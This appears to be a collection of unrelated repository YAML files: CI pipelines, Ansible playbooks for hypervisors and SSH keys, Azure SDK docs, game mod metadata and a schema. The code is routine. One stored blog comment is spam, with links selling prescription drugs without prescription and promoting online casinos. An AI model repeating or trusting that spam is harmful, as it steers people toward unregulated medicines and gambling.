SAVE_PROG:0 "Spielstand ( $VALUE$% )"
RNW_PROG:0 "ZNW wird übertragen ( $VALUE$% )"
## OUTLINER ##
TRANSFER_IN_TRADE2:0 "$VAL|Y$¤-> $WHERE$"
## MSG_FILTERS ##
MSG_FILTER_DESELECT:0 "§YMarkierungen aufheben§!"
MSG_FILTER_BEST_GUESS:0 "§GEinschätzung§!"
MSG_FILTER_ENEMIES:0 "§RFeinde§!"
MSG_FILTER_ALLIES:0 "§BVerbündete§!"
MSG_FILTER_NEIGHBOURS:0 "§gNachbarn§!"
SORT_BY_NAME:1 "Name"
SORT_BY_SELECTED:0 "Auswahl"
## COUNTRY COURT VIEW ##
NO_HEIR:0 "§YKein legitimer Nachfolger§!"
## COUNTRY DIPLOMATIC VIEW ##
# Color keywords
FRIENDS:0 "§GFreunde§!"
FE_PLAYERS:0 "§YMitspieler§!"
LEDGER_CLEAR:0 "§OZurücksetzen§!"
## PROVINCE VIEW ##
PROVVIEW_OCCUPIED_BY_YOU:0 "§GVon Euch besetzt§!"
## PEACE VIEW ##
CLEAR_OFFER:0 "£no£ Angebot entfernen"
## MISCELLANEOUS ##
|
Royal_Eagle_UI/localisation/replace/RoyalEagleUI_l_german.yml
|
version: 2
jobs:
minitest:
docker:
- image: circleci/ruby:2.7.1-node-browsers-legacy
environment:
RAILS_ENV: test
TESTOPTS: "--ci-report --ci-dir=/tmp/test_reports/minitest"
# https://discuss.circleci.com/t/rails-app-cant-connect-to-postgres-server/13059
PGHOST: 127.0.0.1
PGUSER: root
- image: circleci/postgres:10.3
environment:
POSTGRES_USER: root
POSTGRES_DB: volunteer_test
steps:
- checkout
- restore_cache:
keys:
- v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
# fallback to using the latest cache if no exact match is found
- v1-ruby-dependencies-
- run:
name: install dependencies
command: |
gem install bundler -v 1.17.3
bundle install --local --jobs=4 --retry=3 --path vendor/bundle
- save_cache:
paths:
- ./vendor/bundle
key: v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
- run: bundle exec rake db:create db:schema:load
- run:
name: run unit tests
command: bundle exec rake test
- store_test_results:
path: /tmp/test_reports
rubocop:
docker:
- image: circleci/ruby:2.7.1-node-browsers
environment:
RAILS_ENV: development
TESTOPTS: "--ci-report --ci-dir=/tmp/rubocop_reports/"
steps:
- checkout
- restore_cache:
keys:
- v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
# fallback to using the latest cache if no exact match is found
- v1-ruby-dependencies-
- run:
name: install dependencies
command: |
gem install bundler -v 1.17.3
bundle install --local --jobs=4 --retry=3 --path vendor/bundle
- save_cache:
paths:
- ./vendor/bundle
key: v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
- run:
name: run Rubocop
command: bundle exec rubocop
- store_test_results:
path: /tmp/rubocop_reports
jest:
docker:
- image: circleci/node:12-stretch-browsers
steps:
- checkout
- restore_cache:
keys:
- yarn-packages-v2-{{ checksum "yarn.lock" }}
- run:
name: install dependencies
command: yarn install
- save_cache:
paths:
- ~/.cache/yarn
key: yarn-packages-v2-{{ checksum "yarn.lock" }}
- run:
name: run javascript tests
command: yarn test -- --ci --runInBand --reporters=default --reporters=jest-junit
- store_test_results:
path: /tmp/test_reports
workflows:
version: 2
test_suite:
jobs:
- minitest
- rubocop
- jest
|
.circleci/config.yml
|
---
- name: Setup any hypervisors
hosts: hypervisors
tasks:
- name: Install required packages
dnf:
name:
- bridge-utils
- libvirt-client
- python3-libvirt
- python3-lxml
- libvirt-daemon-kvm
- qemu-img
- qemu-kvm
- virt-install
- cloud-utils
- sshpass
state: latest
- name: Check if libvirt image_path exists
stat:
path: "{{ image_path }}"
register: st
    - name: Create libvirt image_path if it does not exist
file:
path: "{{ image_path }}"
state: directory
owner: root
group: root
mode: "u=rwx,g=rwx,o=rx"
seuser: "system_u"
setype: "virt_var_lib_t"
register:
image_create
when:
- not st.stat.exists
- name: Allow libvirt to manage files in image_path
sefcontext:
target: "{{ image_path }}(/.*)?"
seuser: "system_u"
setype: "virt_var_lib_t"
state: present
when:
- image_create is changed
- name: Restart libvirtd
service:
name: libvirtd
state: restarted
- name: List libvirt pools
virt_pool:
command: list_pools
register: pool_list
- name: Define libvirt default pool
virt_pool:
command: define
name: default
xml: '{{ lookup("template", "templates/default_storage_xml.j2") }}'
when: '"default" not in pool_list.list_pools'
- name: Get libvirt default pool status
virt_pool:
command: status
name: default
register: default_pool
# Build a storage pool if it does not exist
- name: Build libvirt default pool
virt_pool:
command: build
name: default
when: 'default_pool.status not in "active"'
# Ensure that a pool is active (needs to be defined and built first)
- name: Start libvirt default pool
virt_pool:
state: active
name: default
when: 'default_pool.status not in "active"'
# Ensure that a given pool will be started at boot
- name: Enable autostart libvirt default pool
virt_pool:
autostart: yes
name: default
|
kata-nested-vm-host/ansible/playbook/hypervisor.yaml
|
_id: df96b9a0-418e-11ea-a28c-05b60d2563f6
message: >-
Early zla.psdg.hashtafak.github.io.swv.wm schizophrenia, coincide
[URL=http://bonusgambling-casino.space/#best-online-casino]online casino
review[/URL]
[URL=http://chesscoachcentral.com/product/trazodone/#trazodone-buy-online]buy
trazodone w not prescription[/URL]
[URL=http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#cialis-pharmacy]on
line pharmacy[/URL]
[URL=http://srqypg.com/product/jelly-pack-15/#jelly-pack-15-generic-pills]generic
jelly pack 15 at walmart[/URL]
[URL=http://csharp-eval.com/rumalaya-fort/#rumalaya-fort]non prescription
rumalaya fort[/URL]
[URL=http://russianpoetsfund.com/product/pristiq/#pristiq]pristiq[/URL]
[URL=http://bigskilletlive.com/zithromax/#zithromax-antibiotic]aminoglycosides
and azithromycin[/URL] progenitors dispensed illness, <a
href="http://bonusgambling-casino.space/#online-casino-wagering">online
casinos</a> <a
href="http://chesscoachcentral.com/product/trazodone/#lowest-price-on-generic-trazodone">trazodone</a>
<a
href="http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#canadian-pharmacy-cialis-20mg">canadapharmacy.com</a>
<a
href="http://srqypg.com/product/jelly-pack-15/#jelly-pack-15-buy-in-canada">jelly
pack 15 buy in canada</a> <a
href="http://csharp-eval.com/rumalaya-fort/#non-prescription-rumalaya-fort">rumalaya
fort online canada</a> <a
href="http://russianpoetsfund.com/product/pristiq/#cost-of-pristiq-tablets">pristiq
without dr prescription usa</a> <a
href="http://bigskilletlive.com/zithromax/#buy-azithromycin">buy
azithromycin</a> bathing allay
http://bonusgambling-casino.space/#best-online-casino-gambling casino games
http://chesscoachcentral.com/product/trazodone/#buy-trazodone-w-not-prescription
trazodone coupons
http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#pharmacy on line
pharmacy on line pharmacy
http://srqypg.com/product/jelly-pack-15/#pharmacy-prices-for-jelly-pack-15
jelly pack 15 online
http://csharp-eval.com/rumalaya-fort/#rumalaya-fort-without-a-prescription
rumalaya fort
http://russianpoetsfund.com/product/pristiq/#buy-pristiq-online-canada pristiq
no prescription http://bigskilletlive.com/zithromax/#zithromax-antibiotic
zithromax online azax ranbaxy 250mg azithromycin basal hepatocellular noticed.
name: ogpatini
email: dd7324a17215c198192d09c7bba24a4c
url: 'http://bonusgambling-casino.space/'
hidden: ''
date: '2020-01-28T05:27:28.315Z'
|
_data/comments/dear-diary/comment-1580189248316.yml
|
uid: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds*"
fullName: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds"
name: "setDefaultTimeToLiveInSeconds"
nameWithType: "CosmosContainerProperties.setDefaultTimeToLiveInSeconds"
members:
- uid: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds(java.lang.Integer)"
fullName: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds(Integer timeToLive)"
name: "setDefaultTimeToLiveInSeconds(Integer timeToLive)"
nameWithType: "CosmosContainerProperties.setDefaultTimeToLiveInSeconds(Integer timeToLive)"
summary: "Sets the container's default time-to-live value.\n\nThe default time-to-live value on a container is an optional property. If set, the items within the container expires after the specified number of seconds since their last write time. The value of this property should be one of the following:\n\nnull - indicates evaluation of time-to-live is disabled and items within the container will never expire, regardless whether individual items have their time-to-live set.\n\nnonzero positive integer - indicates the default time-to-live value for all items within the container. This value can be overridden by individual items time-to-live value.\n\n\\-1 - indicates by default all items within the container never expire. This value can be overridden by individual items time-to-live value."
parameters:
- description: "the default time-to-live value in seconds."
name: "timeToLive"
type: "<xref href=\"java.lang.Integer?alt=java.lang.Integer&text=Integer\" data-throw-if-not-resolved=\"False\" />"
syntax: "public CosmosContainerProperties setDefaultTimeToLiveInSeconds(Integer timeToLive)"
returns:
description: "the CosmosContainerProperties."
type: "<xref href=\"com.azure.cosmos.models.CosmosContainerProperties?alt=com.azure.cosmos.models.CosmosContainerProperties&text=CosmosContainerProperties\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.cosmos.models"
artifact: com.azure:azure-cosmos:4.4.0-beta.1
|
preview/docs-ref-autogen/com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds.yml
|
--- !<MODEL>
contentType: "MODEL"
firstIndex: "2018-12-25 17:57"
game: "Unreal Tournament"
name: "Genestealer"
author: "Unknown"
description: "None"
releaseDate: "2000-09"
attachments:
- type: "IMAGE"
name: "genestealer_shot_5.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_5.png"
- type: "IMAGE"
name: "genestealer_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_3.png"
- type: "IMAGE"
name: "genestealer_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_1.png"
- type: "IMAGE"
name: "genestealer_shot_6.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_6.png"
- type: "IMAGE"
name: "genestealer_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_4.png"
- type: "IMAGE"
name: "genestealer_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_2.png"
originalFilename: "genestealer.zip"
hash: "b419d1174cf1886976e4b65a35e2b4a59e650bb7"
fileSize: 1759135
files:
- name: "genest.u"
fileSize: 1537248
hash: "515d13d5b96db073de7096450d0c9ac8ebc2f478"
- name: "GenestSkins.utx"
fileSize: 578643
hash: "1bf51afee3ecb22587b59e4fc9bf886398ddb9b0"
- name: "GenestealerModel.umod"
fileSize: 2153253
hash: "052c1fcba3d15d9907791fadf7926d17a01ab135"
otherFiles: 10
dependencies: {}
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Models/G/genestealer.zip"
main: true
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Models/ModelsG/genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Skins/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Skins/SkinsG/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Models/G/b/4/19d117/genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://ut-files.com/index.php?dir=Models/ModelsG/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Models/G/b/4/19d117/genestealer.zip"
main: false
repack: false
state: "OK"
deleted: false
models:
- "Genestealer"
skins: []
|
content/Unreal Tournament/Models/G/b/4/19d117/genestealer_[b419d117].yml
|
nameWithType: VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer
type: method
members:
- fullName: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
name: withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
nameWithType: VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
parameters:
- description: <p>the primary Internet-facing load balancer </p>
name: loadBalancer
type: <xref href="com.microsoft.azure.management.network.LoadBalancer?alt=com.microsoft.azure.management.network.LoadBalancer&text=LoadBalancer" data-throw-if-not-resolved="False"/>
returns:
description: <p>the next stage of the update </p>
type: <xref href="com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool?alt=com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool&text=VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool" data-throw-if-not-resolved="False"/>
summary: >-
<p>Specifies the load balancer to be used as the Internet-facing load balancer for the virtual machines in the scale set. </p>
<p>This will replace the current Internet-facing load balancer associated with the virtual machines in the scale set (if any). By default all the backend and inbound NAT pool of the load balancer will be associated with the primary network interface of the virtual machines unless a subset of them is selected in the next stages </p>
syntax: public WithPrimaryInternetFacingLoadBalancerBackendOrNatPool withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
uid: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer)
uid: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer*
fullName: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer
name: withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
package: com.microsoft.azure.management.compute
metadata: {}
|
legacy/docs-ref-autogen/com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer.yml
|
version: 2.1
executors:
docker:
environment:
API_IMAGE_NAME: shellhubio/devicehub-api
SSH_IMAGE_NAME: shellhubio/devicehub-ssh
WS_IMAGE_NAME: shellhubio/devicehub-ws
UI_IMAGE_NAME: shellhubio/devicehub-ui
GATEWAY_IMAGE_NAME: shellhubio/devicehub-gateway
docker:
- image: circleci/buildpack-deps:stretch
jobs:
build:
executor: docker
steps:
- checkout
- setup_remote_docker
- run:
name: Build API microservice
working_directory: api
command: docker build -t $API_IMAGE_NAME:latest .
- run:
name: Build SSH microservice
working_directory: ssh
command: docker build -t $SSH_IMAGE_NAME:latest .
- run:
name: Build WS microservice
working_directory: ws
command: docker build -t $WS_IMAGE_NAME:latest .
- run:
name: Build UI microservice
working_directory: ui
command: docker build -t $UI_IMAGE_NAME:latest .
- run:
name: Build API Gateway microservice
working_directory: gateway
command: docker build -t $GATEWAY_IMAGE_NAME:latest .
- run:
name: Archive Docker images
command: |
docker save $(docker images | awk '{if ($1 ~ /\/devicehub-/) print $3}') -o images.tar
docker images | awk '{if ($1 ~ /\/devicehub-/) print $1 " " $3}' > tags.txt
- persist_to_workspace:
root: .
paths:
- ./images.tar
- ./tags.txt
push:
executor: docker
steps:
- setup_remote_docker
- attach_workspace:
at: /tmp/workspace
- run:
name: Setup DockerHub credentials
command: echo "$DOCKERHUB_PASSWORD" | docker login -u "$DOCKERHUB_USERNAME" --password-stdin
- run:
name: Load archived Docker images
command: |
docker load -i /tmp/workspace/images.tar
awk '{ print "docker tag "$2" "$1"" | "/bin/sh"}' /tmp/workspace/tags.txt
- run:
name: Publish API microservice image
command: docker push $API_IMAGE_NAME:latest
- run:
name: Publish SSH microservice image
command: docker push $SSH_IMAGE_NAME:latest
- run:
name: Publish WS microservice image
command: docker push $WS_IMAGE_NAME:latest
- run:
name: Publish UI microservice image
command: docker push $UI_IMAGE_NAME:latest
- run:
name: Publish API Gateway microservice image
command: docker push $GATEWAY_IMAGE_NAME:latest
deploy:
executor: docker
steps:
- add_ssh_keys:
fingerprints:
- "6f:33:16:6f:5e:bf:4b:bd:af:e4:70:c6:60:76:b2:b7"
- run:
name: Update containers
command: |
ssh $DEPLOY_HOST -o "StrictHostKeyChecking no" -o "LogLevel=error" -l root -p 2222 'docker-compose pull; docker-compose up -d'
workflows:
version: 2
master:
jobs:
- build:
filters:
branches:
only: master
- push:
requires:
- build
filters:
branches:
only: master
- deploy:
requires:
- push
filters:
branches:
only: master
|
.circleci/config.yml
|
$linkedData:
term: CargoLineItem
'@id': https://w3id.org/traceability#CargoLineItem
title: Cargo Line Item
description: Identifies the specific details of packages within a cargo item.
type: object
properties:
type:
oneOf:
- type: array
- type: string
enum:
- CargoLineItem
cargoLineItemID:
title: cargoLineItemID
description: >-
Identifies the cargo line item (package) within the cargo. The cargo line
item ID is provided by the shipper and is used to define the stuffing.
Cargo line items belonging to the same cargo items are stuffed in the same
container.
type: string
$linkedData:
term: cargoLineItemID
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/cargoLineItemID
shippingMarks:
title: shippingMarks
description: >-
The identifying details of a package or the actual markings that appear on
the package(s). This information is provided by the shipper.
type: string
$linkedData:
term: shippingMarks
'@id': >-
https://service.unece.org/trade/uncefact/vocabulary/uncefact/#physicalShippingMarks
descriptionOfGoods:
title: Description of Goods
description: >-
The cargo description are details which accurately and properly describe
the cargo being shipped in the container(s) as provided by the shipper.
type: string
$linkedData:
term: descriptionOfGoods
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/descriptionOfGoods
HSCode:
title: HS Code
description: Used by customs to classify the product being shipped.
type: string
$linkedData:
term: HSCode
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/HSCode
required:
- shippingMarks
example: |-
{
"type": "CargoLineItem",
"cargoLineItemID": "3312591",
"shippingMarks": "Premium break pads"
}
|
docs/openapi/components/schemas/common/CargoLineItem.yml
|
uid: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo*"
fullName: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo"
name: "ShareFileCopyInfo"
nameWithType: "ShareFileCopyInfo.ShareFileCopyInfo"
members:
- uid: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo(java.lang.String,java.lang.String,com.azure.storage.file.share.models.CopyStatusType,java.lang.String,java.time.OffsetDateTime,java.lang.String)"
fullName: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
name: "ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
nameWithType: "ShareFileCopyInfo.ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
summary: "Creates an instance of copy information about a specific File."
parameters:
- description: "The url of the source file."
name: "copySource"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "String identifier for this copy operation."
name: "copyId"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "State of the copy operation with these values:\n <ul>\n <li>success: the copy completed successfully.</li>\n <li>pending: the copy is still in progress.</li>\n </ul>"
name: "copyStatus"
type: "<xref href=\"com.azure.storage.file.share.models.CopyStatusType?alt=com.azure.storage.file.share.models.CopyStatusType&text=CopyStatusType\" data-throw-if-not-resolved=\"False\" />"
- description: "If the copy is completed, contains the ETag of the destination file. If the copy is not complete,\n contains the ETag of the empty file created at the start of the copy."
name: "eTag"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "The date/time that the copy operation to the destination file completed."
name: "lastModified"
type: "<xref href=\"java.time.OffsetDateTime?alt=java.time.OffsetDateTime&text=OffsetDateTime\" data-throw-if-not-resolved=\"False\" />"
- description: "An error message for the copy operation. <code>null</code> if there are no errors."
name: "error"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
syntax: "public ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
type: "constructor"
metadata: {}
package: "com.azure.storage.file.share.models"
artifact: com.azure:azure-storage-file-share:12.8.0
|
docs-ref-autogen/com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo.yml
|
name: Tests
on:
push:
pull_request:
jobs:
test:
name: ${{ matrix.redmine }} ruby-${{ matrix.ruby }}
runs-on: ubuntu-latest
strategy:
matrix:
ruby: ['2.7', '2.6', '3.0']
redmine: ['4.1-stable', '4.2-stable', 'master']
exclude:
- ruby: '2.7'
redmine: 4.1-stable
- ruby: '3.0'
redmine: 4.1-stable
- ruby: '3.0'
redmine: 4.2-stable
fail-fast: false
services:
postgres:
image: postgres:14
env:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: <PASSWORD>
ports:
- 5432:5432
options: >-
--health-cmd pg_isready
--health-interval 10s
--health-timeout 5s
--health-retries 5
steps:
- name: Checkout Redmine
uses: actions/checkout@v2
with:
repository: redmine/redmine
ref: ${{ matrix.redmine }}
path: redmine
- name: Checkout redmine_lightbox
uses: actions/checkout@v2
with:
repository: AlphaNodes/redmine_lightbox
path: redmine/plugins/redmine_lightbox
- name: Update package archives
run: sudo apt-get update --yes --quiet
- name: Install package dependencies
run: >
sudo apt-get install --yes --quiet
build-essential
cmake
libicu-dev
libpq-dev
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true # runs 'bundle install' and caches installed gems automatically
- name: Prepare Redmine source
working-directory: redmine
run: |
cp plugins/redmine_lightbox/test/support/database.yml config/
cp plugins/redmine_lightbox/test/support/configuration.yml config/
- name: Install Ruby dependencies
working-directory: redmine
run: |
bundle config set --local without 'development'
bundle install --jobs=4 --retry=3
- name: Run Redmine rake tasks
env:
RAILS_ENV: test
working-directory: redmine
run: |
bundle exec rake generate_secret_token
bundle exec rake db:create db:migrate
bundle exec rake db:test:prepare
- name: Run tests
env:
RAILS_ENV: test
working-directory: redmine
run: bundle exec rake redmine:plugins:test NAME=redmine_lightbox RUBYOPT="-W0"
|
.github/workflows/tests.yml
|
AllCops:
TargetRubyVersion: 2.3
Exclude:
# This file is autogenerated by Rails, we shouldn't worry about changing its
# format.
- 'db/schema.rb'
# Some people may choose to install gems into vendor/bundle/, which will
# break Rubocop. Ignore it.
- 'vendor/**/*'
- 'bundler_cache/**/*'
# Disable line length checks
Metrics/LineLength:
Enabled: false
# Disable class length checks
Metrics/ClassLength:
Enabled: false
# Disable method length checks
Metrics/MethodLength:
Enabled: false
# Disable block length checks
Metrics/BlockLength:
Enabled: false
# Disable Assignment Branch Condition size check
Metrics/AbcSize:
Enabled: false
# Disable check for methods requiring more than 5 parameters.
Metrics/ParameterLists:
Enabled: false
# Disable check for cyclomatic complexity. While we'll certainly have to
# refactor our code as we code, it's just a nuisance right now.
Metrics/CyclomaticComplexity:
Enabled: false
# Same deal as above, except for perceived complexity.
Metrics/PerceivedComplexity:
Enabled: false
# Disable for built-in Rails scripts in bin/ because it breaks them.
Style/MixinUsage:
Exclude:
- 'bin/**/*'
# Don't worry about having top-level class documentation comments for every
# class. It'd be a nuisance to do this on all of the generated Rails classes.
Documentation:
Enabled: false
# Exclude all tests from this check because this makes a core part of RSpec's
# DSL ugly.
#
# Example: the following test would be invalid with this check enabled.
#
# expect { User.create }.to change { User.count }.by 1
#
Lint/AmbiguousBlockAssociation:
Exclude:
- 'spec/**/*'
# Run those Rails cops!
Rails:
Enabled: true
# Disable preference for has_many :through over has_and_belongs_to_many. They're
# different types of relationships and Rails attaches different helper methods
# for each, not sure why Rubocop has a preference for this by default.
Rails/HasAndBelongsToMany:
Enabled: false
# Disable inverse_of check because it's automatically implicitly added in recent
# Rails versions
Rails/InverseOf:
Enabled: false
# Don't force :dependent to be specified because :nullify is a sane default.
Rails/HasManyOrHasOneDependent:
Enabled: false
# Don't force usage of ApplicationRecord instead of ActiveRecord::Base in Rails
# migrations because migrations shouldn't depend on application code.
Rails/ApplicationRecord:
Exclude:
- 'db/migrate/**'
|
.rubocop.yml
|
name: ABI Test
on:
schedule:
# run daily 20:00 on main branch
- cron: '0 20 * * *'
push:
branches:
- prerelease_test
jobs:
abi_test:
name: ABI Test ${{ matrix.type}} PG${{ matrix.pg }}
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
pg: ["12.8","13.4","14.0"]
type: ["min","max"]
steps:
- name: Checkout TimescaleDB
uses: actions/checkout@v2
- name: Build extension
run: |
if [[ "${{ matrix.type }}" == "min" ]]; then
PG_MAJOR=$(echo "${{matrix.pg}}" | cut -c 1-2 )
# this will be latest released version
BUILDER_IMAGE="postgres:${PG_MAJOR}-alpine"
else
BUILDER_IMAGE="postgres:${{matrix.pg}}-alpine"
fi
docker run -i --rm -v $(pwd):/mnt ${BUILDER_IMAGE} bash <<"EOF"
apk add cmake gcc make build-base krb5-dev openssl-dev > /dev/null
cd /mnt
BUILD_DIR=build_abi BUILD_FORCE_REMOVE=true ./bootstrap
make -C build_abi install
mkdir -p build_abi/install_ext build_abi/install_lib
cp `pg_config --sharedir`/extension/timescaledb*.{control,sql} build_abi/install_ext
cp `pg_config --pkglibdir`/timescaledb*.so build_abi/install_lib
EOF
- name: Run tests
run: |
if [[ "${{ matrix.type }}" == "min" ]]; then
TEST_IMAGE="postgres:${{matrix.pg}}-alpine"
else
PG_MAJOR=$(echo "${{matrix.pg}}" | cut -c 1-2 )
# this will be latest released version
TEST_IMAGE="postgres:${PG_MAJOR}-alpine"
fi
docker run -i --rm -v $(pwd):/mnt ${TEST_IMAGE} bash <<"EOF"
apk add cmake gcc make build-base krb5-dev openssl-dev sudo > /dev/null
cd /mnt
cp build_abi/install_ext/* `pg_config --sharedir`/extension/
cp build_abi/install_lib/* `pg_config --pkglibdir`
chown -R postgres /mnt
set -o pipefail
sudo -u postgres make -C build_abi -k regresscheck regresscheck-t regresscheck-shared IGNORES="memoize" | tee installcheck.log
EOF
- name: Show regression diffs
if: always()
id: collectlogs
run: |
sudo chmod a+rw .
sudo find . -name regression.diffs -exec cat {} + > regression.log
sudo find . -name postmaster.log -exec cat {} + > postgres.log
if [[ -s regression.log ]]; then echo "::set-output name=regression_diff::true"; fi
grep -e 'FAILED' -e 'failed (ignored)' installcheck.log || true
cat regression.log
- name: Save regression diffs
if: always() && steps.collectlogs.outputs.regression_diff == 'true'
uses: actions/upload-artifact@v2
with:
name: Regression diff ABI Breakage ${{ matrix.type }} PG${{ matrix.pg }}
path: regression.log
- name: Save postmaster.log
if: always()
uses: actions/upload-artifact@v2
with:
name: PostgreSQL log ABI Breakage ${{ matrix.type }} PG${{ matrix.pg }}
path: postgres.log
|
.github/workflows/abi.yaml
|
---
#| Check Password
- name: private-keys - Check if Password Required
stat:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_keys_key_name) }}'
register: _ssh_keystate
when: (item.password_protected is defined and item.password_protected | bool) and
(ssh_password == '' and (not item.password is defined or item.password == ''))
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Check if Key Already Exists
fail:
msg: 'Password required, not provided: User - {{ item.stat }}'
when: ((item.stat is defined and not item.stat.exists) and
(item.skipped is undefined))
with_items:
- '{{ _ssh_keystate.results }}'
#| Generate Private Key(s)
- name: private-keys - Generate Password-less Private Key(s)
shell: |
if [ ! -f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }} ] ; then
ssh-keygen -t rsa -N "" \
-f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}
fi
args:
creates: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
when: not item.password_protected is defined or not (item.password_protected | bool)
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Generate Protected Private Key(s)
shell: |
if [ ! -f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }} ] ; then
ssh-keygen -t rsa -N {{ item.password | d(ssh_password) }} \
-f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}
fi
args:
creates: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
when: item.password_protected is defined and (item.password_protected | bool)
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
#| Verify File Permissions
- name: private-keys - Verify Private Key Permissions
file:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
state: file
owner: '{{ item.owner }}'
